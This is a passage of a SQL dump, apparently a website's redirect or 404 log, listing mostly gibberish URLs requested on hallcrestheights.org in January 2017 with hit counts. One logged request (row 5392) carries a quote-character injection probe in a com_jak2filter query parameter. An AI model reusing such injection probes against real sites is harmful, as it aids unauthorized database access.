00:00:00'),(5344,'http://www.hallcrestheights.org/i20162634-zmku-edtzjiv/k42962-yoqxi-fgxuhx-ptvuhmi-wnzkorpv.htm',NULL,'','',1,0,'2017-01-15 03:16:10','0000-00-00 00:00:00'),(5345,'http://www.hallcrestheights.org/ixnm-ueahwhi/k62762-ozhjx-bnwpge-yooayik-i20162633-uksszqce.htm',NULL,'','',1,0,'2017-01-15 03:19:10','0000-00-00 00:00:00'),(5346,'http://www.hallcrestheights.org/edzvdlqc-omnnm/k16070-mcawvbfu-japyvrl-i20162632-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-15 03:22:11','0000-00-00 00:00:00'),(5347,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq/k21534-semgwkow-hmemxg-kucyb-i20162637-npzkic-vejxk-ulzjcjk.htm',NULL,'','',1,0,'2017-01-15 03:26:35','0000-00-00 00:00:00'),(5348,'http://www.hallcrestheights.org/i20162628-uptt-mnbeatg/k57542-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'','',1,0,'2017-01-15 03:31:10','0000-00-00 00:00:00'),(5349,'http://www.hallcrestheights.org/edzvdlqc-omnnm/k51170-mcawvbfu-i20162631-japyvrl-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-15 03:34:10','0000-00-00 00:00:00'),(5350,'http://www.hallcrestheights.org/jgletk-ymdrqz-k2326-nrvmlk/i20162628-swaz-vkecqq-neeiaq-jzlnp.htm',NULL,'','',1,0,'2017-01-15 03:37:10','0000-00-00 00:00:00'),(5351,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl/lzoh-k43726-njumnt-i20162637-ecwfog-ywbiw.htm',NULL,'','',1,0,'2017-01-15 03:40:10','0000-00-00 00:00:00'),(5352,'http://www.hallcrestheights.org/ryvhrh-mqtyys-llgeaj/k23026-anpd-mefnxh-i20162637-qfhjdy-haoxr.htm',NULL,'','',1,0,'2017-01-15 03:43:10','0000-00-00 00:00:00'),(5353,'http://www.hallcrestheights.org/dvisci-k62266-wbvwku-i20162634-xkrbzo/msmv-uclzup-hvqawu-oxzmn.htm',NULL,'','',1,0,'2017-01-15 03:46:10','0000-00-00 00:00:00'),(5354,'http://www.hallcrestheights.org/zmkued-k44626-tzjivy-oqxifg/xuhx-ptvuhm-i20162637-iwnzko-rpvub.htm',NULL,'','',1,0,'2017-01-15 03:49:10','0000-00-00 00:00:00'),(5355,'http://www.hallcrestheights.org/vqjnys-pvholj-peurrt/i20162635-pilu-ourxiv-lbtrhn-k20866-nmtqz.htm',NULL,'','',1,0,'2017-01-15 03:52:10','0000-00-00 00:00:00'),(5356,'http://www.hallcrestheights.org/upttm-nbea-k22234-tgrb/nqcdcncx-rdhcpgzz-i20162637-dllimv-yxjlt.htm',NULL,'','',1,0,'2017-01-15 03:55:10','0000-00-00 00:00:00'),(5357,'http://www.hallcrestheights.org/gnfzn-xvjx-palt/itjshkyj-i20162636-yldpijaa-mdurta-k42034-enpgg.htm',NULL,'','',1,0,'2017-01-15 03:58:10','0000-00-00 00:00:00'),(5358,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl/k32854-lgeajanp-i20162636-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',1,0,'2017-01-15 04:01:10','0000-00-00 00:00:00'),(5359,'http://www.hallcrestheights.org/fadla-i20162633-k17914-jfnl-gfpc/vwgmyhde-cwxbdeud-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-15 04:04:10','0000-00-00 00:00:00'),(5360,'http://www.hallcrestheights.org/vqjny-i20162633-spvh-oljp/eurrtpil-uourxivl-k37714-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-15 04:10:10','0000-00-00 00:00:00'),(5361,'http://www.hallcrestheights.org/mrcqg-beif-uwgr/k61834-abtnwyrq-i20162636-semgwkow-hmemxg-kucyb.htm',NULL,'','',1,0,'2017-01-15 04:13:10','0000-00-00 00:00:00'),(5362,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx-palt/itjshkyj-yldpijaa-mdurta-k58414-enpgg.htm',NULL,'','',1,0,'2017-01-15 04:16:10','0000-00-00 00:00:00'),(5363,'http://www.hallcrestheights.org/k52654-upttm-nbea-tgrb/nqcdcncx-i20162636-rdhcpgzz-dllimv-yxjlt.htm',NULL,'','',1,0,'2017-01-15 04:19:10','0000-00-00 00:00:00'),(5364,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx-palt/itjshkyj-yldpijaa-mdurta-k42034-enpgg.htm',NULL,'','',1,0,'2017-01-15 04:22:10','0000-00-00 00:00:00'),(5365,'http://www.hallcrestheights.org/fadla-jfnl-gfpc/vwgmyhde-i20162636-cwxbdeud-kovfii-k31954-bptqu.htm',NULL,'','',1,0,'2017-01-15 04:25:10','0000-00-00 00:00:00'),(5366,'http://www.hallcrestheights.org/edzvd-lqco-k41134-mnnm/mcawvbfu-i20162636-japyvrlf-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-15 04:28:10','0000-00-00 00:00:00'),(5367,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj-ivyo/qxifgxuh-k17014-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-15 04:31:10','0000-00-00 00:00:00'),(5368,'http://www.hallcrestheights.org/lugdl-trsm-xxhy/pzqjllzo-i20162636-k53554-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',1,0,'2017-01-15 04:34:10','0000-00-00 00:00:00'),(5369,'http://www.hallcrestheights.org/vqjny-spvh-oljp/eurrtpil-uourxivl-i20162637-k21334-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-15 04:37:10','0000-00-00 00:00:00'),(5370,'http://www.hallcrestheights.org/i20162632-vqjny-spvh-oljp/eurrtpil-uourxivl-k21334-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-15 04:40:10','0000-00-00 00:00:00'),(5371,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde/cwxbdeu-k49270-dkov-fiibp-i20162631-tquhzx.htm',NULL,'','',1,0,'2017-01-15 04:43:10','0000-00-00 00:00:00'),(5372,'http://www.hallcrestheights.org/i20162632-fadlajfn-lgfpc-k14170-vwgmyhde/cwxbdeu-dkov-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-15 04:46:10','0000-00-00 00:00:00'),(5373,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh/xptvuhm-i20162636-iwnz-k46030-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-15 04:49:10','0000-00-00 00:00:00'),(5374,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq/semgwko-whme-k51070-mxgku-i20162631-cybnpz.htm',NULL,'','',1,0,'2017-01-15 04:52:10','0000-00-00 00:00:00'),(5375,'http://www.hallcrestheights.org/dvisciwb-vwkux-k51970-krbzomsm/vuclzup-hvqa-wuoxz-i20162631-mnpzvs.htm',NULL,'','',1,0,'2017-01-15 04:55:10','0000-00-00 00:00:00'),(5376,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg/i20162635-k26050-eyooayi-kuks-szqce-baqdom.htm',NULL,'','',1,0,'2017-01-15 04:58:10','0000-00-00 00:00:00'),(5377,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k46930-vwgmyhde/cwxbdeu-i20162636-dkov-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-15 05:01:10','0000-00-00 00:00:00'),(5378,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq/semgwko-i20162636-k25330-whme-mxgku-cybnpz.htm',NULL,'','',1,0,'2017-01-15 05:04:10','0000-00-00 00:00:00'),(5379,'http://www.hallcrestheights.org/i20162632-fadlajfn-k37570-lgfpc-vwgmyhde/cwxbdeu-dkov-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-15 05:07:10','0000-00-00 00:00:00'),(5380,'http://www.hallcrestheights.org/dvisciwb-k26230-vwkux-krbzomsm/vuclzup-i20162636-hvqa-wuoxz-mnpzvs.htm',NULL,'','',1,0,'2017-01-15 05:10:10','0000-00-00 00:00:00'),(5381,'http://www.hallcrestheights.org/edzvdlqc-omnnm-i20162634-mcawvbfu/japyvrl-k46750-flxh-qjkuh-kcmumb.htm',NULL,'','',1,0,'2017-01-15 05:13:50','0000-00-00 00:00:00'),(5382,'http://www.hallcrestheights.org/vqjn-k59242-yspvhol-jpeur/i20162628-rtpilu-ourxivl-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-15 05:16:11','0000-00-00 00:00:00'),(5383,'http://www.hallcrestheights.org/k12082-gnfz-nxvjxpa-ltitj/shkyjy-ldpijaa-i20162630-mdurtaen-pggwtdv.htm',NULL,'','',1,0,'2017-01-15 05:19:11','0000-00-00 00:00:00'),(5384,'http://www.hallcrestheights.org/k57442-pcsc-qrufunp-kwxpo/i20162628-ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-15 05:22:11','0000-00-00 00:00:00'),(5385,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx/i20162628-bnwpge-k58342-yooayik-uksszqce-baqdomy.htm',NULL,'','',1,0,'2017-01-15 05:26:09','0000-00-00 00:00:00'),(5386,'http://www.hallcrestheights.org/fadla-jfnl-k234-gfpc/vwgmyhde-cwxbdeud-i20162637-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-15 05:28:12','0000-00-00 00:00:00'),(5387,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv/bfuj-i20162628-apyvrl-flxhqj-k1926-kuhkc-mumbhmg.htm',NULL,'','',1,0,'2017-01-15 05:31:12','0000-00-00 00:00:00'),(5388,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl/lgeajanp-dmefnxhq-i20162637-fhjdyh-k1134-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-15 05:34:12','0000-00-00 00:00:00'),(5389,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo/msmv-uclzup-i20162637-hvqawu-k23526-oxzmn-pzvsgcr.htm',NULL,'','',1,0,'2017-01-15 05:37:12','0000-00-00 00:00:00'),(5390,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl-lgeajanp/dmefnxh-qfhj-dyhao-k15070-xrcjhw.htm',NULL,'','',1,0,'2017-01-15 05:40:12','0000-00-00 00:00:00'),(5391,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm/vuclzup-hvqa-wuoxz-k50670-mnpzvs-i20162631-gcrl.htm',NULL,'','',1,0,'2017-01-15 05:43:12','0000-00-00 00:00:00'),(5392,'http://hallcrestheights.org/index.php?category_id=\'&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5',NULL,'','',1,0,'2017-01-15 05:45:07','0000-00-00 00:00:00'),(5393,'http://www.hallcrestheights.org/i20162632-dvisciw-bvwkuxkr-k41778-bzomsmvu/clzuphv-qawuox-zmnpz-vsgcrlyc-mczo.htm',NULL,'','',1,0,'2017-01-15 05:46:15','0000-00-00 00:00:00'),(5394,'http://www.hallcrestheights.org/joifa/formmail/joetsu_seminar.html',NULL,'','',3,0,'2017-01-15 05:49:32','0000-00-00 00:00:00'),(5395,'http://www.hallcrestheights.org/gnfznxv-k41878-jxpaltit-jshkyjyl-dpijaam/i20162632-durtae-npggw-tdvlxtdq-kunf-glqrhz.htm',NULL,'','',1,0,'2017-01-15 05:53:17','0000-00-00 00:00:00'),(5396,'http://www.hallcrestheights.org/fadla-jfnl-i20162632-gfpc-vwgmyhde/k43134-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg.htm',NULL,'','',1,0,'2017-01-15 05:57:04','0000-00-00 00:00:00'),(5397,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-ifgxuhxp-k42078-tvuhmiw/nzkorp-vubfg-i20162632-nqtpmhpr-bikz-onmtla-jhol-jrdk.htm',NULL,'','',1,0,'2017-01-15 06:01:09','0000-00-00 00:00:00'),(5398,'http://www.hallcrestheights.org/i20162637-dvisciwb-k61590-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq-eludpwcm-egiapx.htm',NULL,'','',1,0,'2017-01-15 06:04:40','0000-00-00 00:00:00'),(5399,'http://www.hallcrestheights.org/ryvhr-hmqt-k59114-yysl-lgeajanp/i20162632-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-15 06:08:26','0000-00-00 00:00:00'),(5400,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab-k578-tnwyrqse-mgwkowh/memxgk-i20162633-ucybn-pzkicvej-xkul-zjcjkn-tsxj-lnuu-uvtff.htm',NULL,'','',1,0,'2017-01-15 06:12:13','0000-00-00 00:00:00'),(5401,'http://www.hallcrestheights.org/tkuykf-i20162633-jdnjjbuc/yupa-k7739-jaylr/',NULL,'','',1,0,'2017-01-15 06:16:00','0000-00-00 00:00:00'),(5402,'http://www.hallcrestheights.org/i20162632-kzpffm-sxklrded/hwge-k49139-fvbbg/',NULL,'','',1,0,'2017-01-15 06:19:48','0000-00-00 00:00:00'),(5403,'http://www.hallcrestheights.org/jgletkym-drqzn-k4250-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-i20162635-nebx-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-15 06:23:35','0000-00-00 00:00:00'),(5404,'http://www.hallcrestheights.org/vqjnyspv-holjp-k50870-eurrtpil-i20162631-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-15 06:27:32','0000-00-00 00:00:00'),(5405,'http://www.hallcrestheights.org/gnfz-nxvjxpa-k21962-ltitj-shkyjy/ldpijaa-mdurtaen-i20162634-pggwtdv-lxtdqkun-fglq-rhzyonxf-eqnzsvvb-pzwdhkv.htm',NULL,'','',1,0,'2017-01-15 06:31:08','0000-00-00 00:00:00'),(5406,'http://www.hallcrestheights.org/xhajvql-i20162631-wczbi/qsosqx-k58723-oqkgqa-qydcp/',NULL,'','',1,0,'2017-01-15 06:34:55','0000-00-00 00:00:00'),(5407,'http://www.hallcrestheights.org/yembjvh-tqqdc/kzfltz-i20162631-terqbw-nswns-k58523-njpl/',NULL,'','',1,0,'2017-01-15 06:38:42','0000-00-00 00:00:00'),(5408,'http://www.hallcrestheights.org/i20162634-soegs-zxyife/tvtnd-yuuh-vfcyzls-k43007-xxqroxae/',NULL,'','',1,0,'2017-01-15 06:42:31','0000-00-00 00:00:00'),(5409,'http://www.hallcrestheights.org/i20162634-nfrko-pdobbu/mgolz-esrk-wtzqtqb-k43907-svjcwjbx/',NULL,'','',1,0,'2017-01-15 06:46:16','0000-00-00 00:00:00'),(5410,'http://www.hallcrestheights.org/i20162632-bsoapa-zapstasg-k49639-mhcq/cmckf-rdtf-kgpvbch-siwhork/',NULL,'','',1,0,'2017-01-15 06:53:50','0000-00-00 00:00:00'),(5411,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa/k46323-jaylrl-wfvdy-ruqp-i20162630-klsdef-hxdfpd/',NULL,'','',1,0,'2017-01-15 06:57:37','0000-00-00 00:00:00'),(5412,'http://www.hallcrestheights.org/yembjvh-k45523-tqqdc-i20162630-kzfltz-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev/',NULL,'','',1,0,'2017-01-15 07:01:23','0000-00-00 00:00:00'),(5413,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-i20162633-fvbbg/zagp-eciyyuw-uvfztji-gjina-mzbcng-k7539-tfml/',NULL,'','',1,0,'2017-01-15 07:08:58','0000-00-00 00:00:00'),(5414,'http://www.hallcrestheights.org/yembjv-htqqdckz-i20162632-fltz-terqb/wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev-k49839-ihsd/',NULL,'','',1,0,'2017-01-15 07:12:51','0000-00-00 00:00:00'),(5415,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-dgfnhs/krljr-i20162631-gfct-fzfiwx-wmakoa-yosmpql-gvegd-k59223-fvgcr/',NULL,'','',1,0,'2017-01-15 07:16:31','0000-00-00 00:00:00'),(5416,'http://www.hallcrestheights.org/vqjn-yspvhol/i20162634-k32462-jpeur-rtpilu.htm',NULL,'','',1,0,'2017-01-15 07:20:18','0000-00-00 00:00:00'),(5417,'http://www.hallcrestheights.org/zmku-edtzjiv/i20162634-k11762-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-15 07:24:06','0000-00-00 00:00:00'),(5418,'http://www.hallcrestheights.org/pcsc-i20162633-qrufunp/k54062-kwxpo-ideotw.htm',NULL,'','',1,0,'2017-01-15 07:28:01','0000-00-00 00:00:00'),(5419,'http://www.hallcrestheights.org/i20162632-zmkuedtz-jivyo/k26270-qxifgxuh-xptvuhm.htm',NULL,'','',1,0,'2017-01-15 07:35:27','0000-00-00 00:00:00'),(5420,'http://www.hallcrestheights.org/gnfznxv-jxpaltit/i20162634-k4958-jshkyjyl-dpijaam.htm',NULL,'','',1,0,'2017-01-15 07:39:14','0000-00-00 00:00:00'),(5421,'http://www.hallcrestheights.org/gnfz-nxvjxpa/k32362-ltitj-shkyjy-i20162634-ldpijaa.htm',NULL,'','',1,0,'2017-01-15 07:46:47','0000-00-00 00:00:00'),(5422,'http://www.hallcrestheights.org/dvis-ciwbvwk/k53062-uxkrb-i20162633-zomsmv-uclzuph.htm',NULL,'','',1,0,'2017-01-15 07:50:35','0000-00-00 00:00:00'),(5423,'http://www.hallcrestheights.org/i20162632-mrcqgbe-ifuwgrab/k31778-tnwyrqse-mgwkowh.htm',NULL,'','',1,0,'2017-01-15 07:54:24','0000-00-00 00:00:00'),(5424,'http://www.hallcrestheights.org/i20162632-ryvhrhm-qtyysllg/k30878-eajanpdm-efnxhqf.htm',NULL,'','',1,0,'2017-01-15 07:58:09','0000-00-00 00:00:00'),(5425,'http://www.hallcrestheights.org/k47770-pcscqruf-unpkw/i20162632-xpoideot-wtvsoar-mosm.htm',NULL,'','',1,0,'2017-01-15 08:01:56','0000-00-00 00:00:00'),(5426,'http://www.hallcrestheights.org/ryvhr-hmqt/k11534-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh.htm',NULL,'','',1,0,'2017-01-15 08:05:43','0000-00-00 00:00:00'),(5427,'http://www.hallcrestheights.org/i20162630-gnfznxv-jxpaltit/jshkyjyl-k59038-dpijaam-durtae.htm',NULL,'','',1,0,'2017-01-15 08:09:29','0000-00-00 00:00:00'),(5428,'http://www.hallcrestheights.org/i20162628-zmkuedtz-jivyo/k29390-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-15 08:13:17','0000-00-00 00:00:00'),(5429,'http://www.hallcrestheights.org/i20162634-dvis-ciwbvwk/k11462-uxkrb-zomsmv-uclzuph-vqawuoxz.htm',NULL,'','',1,0,'2017-01-15 08:17:03','0000-00-00 00:00:00'),(5430,'http://www.hallcrestheights.org/fadlajfn-lgfpc/k46670-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-15 08:20:51','0000-00-00 00:00:00'),(5431,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-k7114-yysl/lgeajanp-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',1,0,'2017-01-15 08:24:38','0000-00-00 00:00:00'),(5432,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx-k53734-palt/itjshkyj-yldpijaa-mdurta-enpgg.htm',NULL,'','',1,0,'2017-01-15 08:28:34','0000-00-00 00:00:00'),(5433,'http://www.hallcrestheights.org/i20162632-zmkuedtz-k24970-jivyo-qxifgxuh/xptvuhm-iwnz-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-15 08:32:12','0000-00-00 00:00:00'),(5434,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg/i20162635-eyooayi-kuks-szqce-k37750-baqdom.htm',NULL,'','',1,0,'2017-01-15 08:35:59','0000-00-00 00:00:00'),(5435,'http://www.hallcrestheights.org/i20162632-lugdltrs-mxxhy-pzqjllzo/k47470-hnjumnt-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-15 08:39:46','0000-00-00 00:00:00'),(5436,'http://www.hallcrestheights.org/i20162632-jgletkym-drqzn-k4770-rvmlkswa/zvkecqq-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-15 08:43:33','0000-00-00 00:00:00'),(5437,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj-ivyo/qxifgxuh-xptvuhmi-wnzkor-k27414-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-15 08:47:20','0000-00-00 00:00:00'),(5438,'http://www.hallcrestheights.org/edzvdlqc-omnnm-k40770-mcawvbfu/japyvrl-flxh-qjkuh-kcmumb-i20162631-hmgz.htm',NULL,'','',1,0,'2017-01-15 08:51:07','0000-00-00 00:00:00'),(5439,'http://www.hallcrestheights.org/zmkue-k48214-dtzj-ivyo-qxifgxuh/i20162632-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-01-15 08:54:54','0000-00-00 00:00:00'),(5440,'http://www.hallcrestheights.org/i20162632-edzvdlq-comnnmmc-awvbfuja/pyvrlfl-xhqjku-hkcmu-k31878-mbhmgznk-ohey.htm',NULL,'','',2,0,'2017-01-15 08:58:40','0000-00-00 00:00:00'),(5441,'http://www.hallcrestheights.org/lugdltr-smxxhypz-k58338-qjllzohn/jumntec-wfogyw-biwyr-i20162630-urfgvfcw-qzhr.htm',NULL,'','',1,0,'2017-01-15 09:02:28','0000-00-00 00:00:00'),(5442,'http://www.hallcrestheights.org/i20162632-ryvhrhm-qtyysllg-eajanpdm/efnxhqf-hjdyha-oxrcj-k51678-hwuvdsve-zytw.htm',NULL,'','',1,0,'2017-01-15 09:06:15','0000-00-00 00:00:00'),(5443,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-eajanpdm/efnxhqf-hjdyha-oxrcj-i20162630-k37638-hwuvdsve-zytw.htm',NULL,'','',1,0,'2017-01-15 09:10:12','0000-00-00 00:00:00'),(5444,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-i20162634-jshkyjyl/dpijaam-durtae-npggw-k25758-tdvlxtdq-kunf.htm',NULL,'','',1,0,'2017-01-15 09:13:49','0000-00-00 00:00:00'),(5445,'http://www.hallcrestheights.org/mrcqgbei-k47170-fuwgr-abtnwyrq-semgwko/i20162632-whme-mxgku-cybnpz-kicv-ejxkulzj.htm',NULL,'','',1,0,'2017-01-15 09:17:35','0000-00-00 00:00:00'),(5446,'http://www.hallcrestheights.org/lugdltr-k4258-smxxhypz-qjllzohn-jumntec/wfogyw-biwyr-i20162634-urfgvfcw-qzhr-ibnkny.htm',NULL,'','',1,0,'2017-01-15 09:21:23','0000-00-00 00:00:00'),(5447,'http://www.hallcrestheights.org/upttm-nbea-i20162632-tgrb-nqcdcncx/k52134-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-15 09:25:23','0000-00-00 00:00:00'),(5448,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-msmv/uclzup-i20162635-hvqawu-k10266-oxzmn-pzvsgcr-lycmczo-qqelud.htm',NULL,'','',1,0,'2017-01-15 09:28:57','0000-00-00 00:00:00'),(5449,'http://www.hallcrestheights.org/k28590-ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-uvds-i20162628-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-15 09:32:44','0000-00-00 00:00:00'),(5450,'http://www.hallcrestheights.org/k40470-vqjnyspv-i20162631-holjp-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-15 09:40:38','0000-00-00 00:00:00'),(5451,'http://www.hallcrestheights.org/pcscqru-funpkwxp-oideotwt-vsoarmo/i20162630-smgepl-alhel-iyrqiyqf-ufxv-k58638-ugowop-egtq-amzi.htm',NULL,'','',1,0,'2017-01-15 09:44:04','0000-00-00 00:00:00'),(5452,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-gmyhdecw-xbdeudk/ovfiib-k31278-ptquh-i20162632-zxchhrmx-agfp-apuhgf-qvjd-clbb.htm',NULL,'','',1,0,'2017-01-15 09:47:51','0000-00-00 00:00:00'),(5453,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh/njumnte-cwfogywb-iwyrurf-k12162-gvfcwqzh-i20162634-ribn-knyfeebs-bjhfkwet.htm',NULL,'','',1,0,'2017-01-15 09:51:38','0000-00-00 00:00:00'),(5454,'http://www.hallcrestheights.org/pcscqru-funpkwxp-k51878-oideotwt-vsoarmo/i20162632-smgepl-alhel-iyrqiyqf-ufxv-ugowop-egtq-amzi-mczjv.htm',NULL,'','',1,0,'2017-01-15 09:55:42','0000-00-00 00:00:00'),(5455,'http://www.hallcrestheights.org/pcscqru-funpkwxp-i20162630-k37838-oideotwt-vsoarmo/smgepl-alhel-iyrqiyqf-ufxv-ugowop-egtq-amzi-mczjv.htm',NULL,'','',1,0,'2017-01-15 09:59:13','0000-00-00 00:00:00'),(5456,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-k31178-cdcncxrd-hcpgzzd/i20162632-llimvy-xjltf-eobkebwi-vsmq-krfbml-kmst-howg-whlkj.htm',NULL,'','',1,0,'2017-01-15 10:06:47','0000-00-00 00:00:00'),(5457,'http://www.hallcrestheights.org/i20162628-xhajvq-lwczbiqs/osqx-k47699-oqkgq/',NULL,'','',1,0,'2017-01-15 10:10:52','0000-00-00 00:00:00'),(5458,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k50690-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-uvds-vezytwlc-i20162637-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-15 10:18:08','0000-00-00 00:00:00'),(5459,'http://www.hallcrestheights.org/kzpffmsx-klrd/i20162634-edhwgef-k34631-vbbgzagp/',NULL,'','',1,0,'2017-01-15 10:21:55','0000-00-00 00:00:00'),(5460,'http://www.hallcrestheights.org/bsoapa-zapstasg/mhcq-cmckf-i20162629-k4399-rdtf/',NULL,'','',1,0,'2017-01-15 10:25:42','0000-00-00 00:00:00'),(5461,'http://www.hallcrestheights.org/ajqxxu-cuzaofif/i20162632-ephi-ijimj-k59839-njbo/',NULL,'','',1,0,'2017-01-15 10:29:29','0000-00-00 00:00:00'),(5462,'http://www.hallcrestheights.org/i20162635-cwhri-wgpekz/k11707-qdwkv-umzb-saiimjz/',NULL,'','',1,0,'2017-01-15 10:33:16','0000-00-00 00:00:00'),(5463,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx/jjikvf-k56923-vtzpxb-xkcwj/',NULL,'','',1,0,'2017-01-15 10:37:03','0000-00-00 00:00:00'),(5464,'http://www.hallcrestheights.org/tkuykfj-dnjjb/i20162630-ucyupa-jaylrl-wfvdy-k56723-ruqp/',NULL,'','',1,0,'2017-01-15 10:44:37','0000-00-00 00:00:00'),(5465,'http://www.hallcrestheights.org/soegsz-i20162629-xyifetvt/ndyu-uhvfc-yzls-k5099-xxqroxa/',NULL,'','',1,0,'2017-01-15 10:48:23','0000-00-00 00:00:00'),(5466,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-terqbw/i20162630-nswns-njpl-pftrrj-ncypjo-qwgzjev-k56703-ihsdp-acayl/',NULL,'','',1,0,'2017-01-15 10:51:03','0000-00-00 00:00:00'),(5467,'http://www.hallcrestheights.org/ajqxxu-i20162629-cuzaofif/ephi-ijimj-njbo-k4199-gtsakbc/',NULL,'','',1,0,'2017-01-15 10:52:11','0000-00-00 00:00:00'),(5468,'http://www.hallcrestheights.org/cwhriwgp-i20162631-k62251-ekzq/dwkvumz-bsaiimjz-fozgdvdd/',NULL,'','',1,0,'2017-01-15 10:55:59','0000-00-00 00:00:00'),(5469,'http://www.hallcrestheights.org/soegsz-xyifetvt/ndyu-uhvfc-yzls-i20162633-k19139-xxqroxa/',NULL,'','',1,0,'2017-01-15 10:59:45','0000-00-00 00:00:00'),(5470,'http://www.hallcrestheights.org/tkuykfjd-k28591-njjb/ucyupaj-i20162633-aylrlwfv-dyruqpkl/',NULL,'','',1,0,'2017-01-15 11:03:32','0000-00-00 00:00:00'),(5471,'http://www.hallcrestheights.org/i20162634-qlbowcig-gece/ayafxrg-lnikghhm-bbxpgesm-k35231-rcai/',NULL,'','',1,0,'2017-01-15 11:07:19','0000-00-00 00:00:00'),(5472,'http://www.hallcrestheights.org/i20162632-xhajvq-k60439-lwczbiqs-osqx/oqkgq-aqyd-cptznzv-tjqoevp/',NULL,'','',1,0,'2017-01-15 11:11:06','0000-00-00 00:00:00'),(5473,'http://www.hallcrestheights.org/cwhriw-i20162633-gpekzqdw-kvum/zbsai-imjz-fozgdvd-k19039-dqjvdob/',NULL,'','',1,0,'2017-01-15 11:14:53','0000-00-00 00:00:00'),(5474,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop/i20162628-dgfnh-k48199-skrl-jrgfctf-zfiwxwm/',NULL,'','',1,0,'2017-01-15 11:18:40','0000-00-00 00:00:00'),(5475,'http://www.hallcrestheights.org/nfrkopdo-i20162633-k29191-bbum-golzesr/kwtzqtqb-svjcwjbx-nmyv-sssl/',NULL,'','',1,0,'2017-01-15 11:22:27','0000-00-00 